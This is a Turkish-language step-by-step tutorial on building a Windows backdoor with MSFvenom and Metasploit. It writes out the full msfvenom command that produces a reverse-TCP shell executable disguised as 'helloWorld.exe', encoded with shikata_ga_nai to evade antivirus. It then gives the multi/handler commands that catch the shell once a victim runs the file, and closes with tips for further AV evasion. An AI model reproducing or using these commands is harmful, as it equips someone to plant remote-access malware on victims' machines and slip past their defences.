Güvenlik mekanizmalarını genellikle gizlice ve çoğunlukla algılanamayacak şekilde atlamak için bir arka kapı kullanılır. msfpayload ve msfencode kombinasyonu olan MSFvenom'u kullanarak, ters kabuk TCP kullanarak saldırgana geri bağlanan bir arka kapı oluşturmak mümkündür. Bir arka kapı geliştirmek için, herhangi bir virüsten koruma yazılımından kaçınmak için kötü amaçlı yazılımınızın imzasını değiştirmeniz gerekir. Bu projeyi erişim izniniz olan bir çift bilgisayarda tamamlayın ve bu süreçte bilgisayar güvenliği ve bu tür arka kapıların nasıl çalıştığı hakkında daha fazla bilgi edineceksiniz.
adımlar
Adım 1. Kali'yi başlatın ve Terminal konsolunu çalıştırın
Adım 2. Arabirimi görüntülemek için ifconfig yazın ve IP adresinizi kontrol edin
Adım 3. Kodlayıcıların listesini göstermek için msfvenom -l kodlayıcıları yazın
Kodlayıcı olarak x86/shikata_ga_nai kullanacaksınız
Adım 4. "msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp LHOST = 192.168.48.129 LPORT=4444 -b "\x00" -e x86/shikata_ga_nai -f exe > helloWorld.exe yazın
- -a x86 --platform pencereleri kullanılacak mimariyi belirler.
- -p windows/shell/reverse_tcp, gömülecek yükleri belirtir.
- LHOST, dinleyici IP adresini belirler.
- LPORT, dinleyici bağlantı noktasını belirtir.
- -b "\x00" hatalı karakterden (boş bayt) kaçınmayı belirtir.
- -e x86/shikata_ga_nai, kodlayıcı adını belirtir.
- -f exe > helloWorld.exe biçim çıktısını belirtir.
Adım 5. Metasploit'i etkinleştirmek için msfconsole yazın
Artık arka kapınızı oluşturdunuz. Kurban, helloWorld.exe'ye tıkladığında, gömülü olan kabuk yükü etkinleştirilecek ve sisteminize geri bağlantı kurulacaktır. Bağlantıyı almak için Metasploit'te çoklu işleyiciyi açmanız ve yükleri ayarlamanız gerekir
Adım 6. Use exploit/multi/handler yazın
Adım 7. Set payload windows/shell/reverse_tcp yazın
Adım 8. Modülü kontrol etmek için seçenekleri göster yazın
Adım 9. Set LHOST 192.168.48.129 yazın
"LHOST", dinleyici IP adresini belirtir
Adım 10. set LPORT 4444 yazın
"LPORT", dinleyici bağlantı noktasını belirtir
Adım 11. Çalıştır yazın ve kurbanın makinesinden bağlantıyı bekleyin
Adım 12. Kurbanın helloWorld.exe'ye tıklamasını bekleyin
Ardından, kurbanın makinesine başarıyla bağlanacaksınız.
İpuçları
- MSFvenom'da -i kullanılması, kodlamanın yinelemelerini temsil edecektir. Bazen daha fazla yineleme, AV yazılımından kaçınmaya yardımcı olabilir.
- MSFvenom kullanarak arka kapıyı nasıl oluşturacağınızı ve kodlayacağınızı öğrendiniz, ancak bu yöntem günümüzde bazı AV yazılımlarına karşı mükemmel şekilde çalışmayacaktır. Bunun nedeni, MSFvenom'daki yürütme şablonlarından kaynaklanmaktadır. AV satıcıları bu şablonların statik imzasını eklediler ve sadece onları aradılar. Bu sorunun çözümü, farklı bir yürütme şablonu veya farklı araçlar kullanmaktır.